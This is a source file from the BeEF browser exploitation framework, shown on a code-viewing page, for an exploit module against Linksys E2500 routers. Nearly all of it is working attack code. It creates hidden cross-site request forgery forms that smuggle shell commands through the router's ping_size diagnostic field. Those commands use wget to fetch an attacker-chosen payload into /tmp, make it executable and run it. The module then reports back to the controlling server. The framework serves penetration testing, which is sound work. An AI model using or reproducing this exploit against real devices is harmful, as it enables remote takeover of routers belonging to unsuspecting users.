CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/router/linksys_e2500_shell/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var base    = '<%= @base %>';
9
  var payload = '<%= @payload %>';
10
  var random = Math.random().toString(36).substring(7);
11
  var timeout = 15;
12

13

14
  var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
15
      [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
16
       {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
17
       {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
18
       {'type':'hidden', 'name':'action', 'value':''},
19
       {'type':'hidden', 'name':'commit', 'value':'0'},
20
       {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
21
       {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'},
22
       {'type':'hidden', 'name':'ping_times', 'value':'5'},
23
       {'type':'hidden', 'name':'traceroute_ip', 'value':''},
24
      ]);
25

26
  var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
27
      [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
28
       {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
29
       {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
30
       {'type':'hidden', 'name':'action', 'value':''},
31
       {'type':'hidden', 'name':'commit', 'value':'0'},
32
       {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
33
       {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'},
34
       {'type':'hidden', 'name':'ping_times', 'value':'5'},
35
       {'type':'hidden', 'name':'traceroute_ip', 'value':''},
36
      ]);
37
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
38

39
  cleanup = function() {
40
    document.body.removeChild(e2500_iframe_1<%= @command_id %>);
41
    document.body.removeChild(e2500_iframe_2<%= @command_id %>);
42
  }
43
  setTimeout("cleanup()", timeout*1000);
44

45
});
46

47

48
Product

Resources

Company
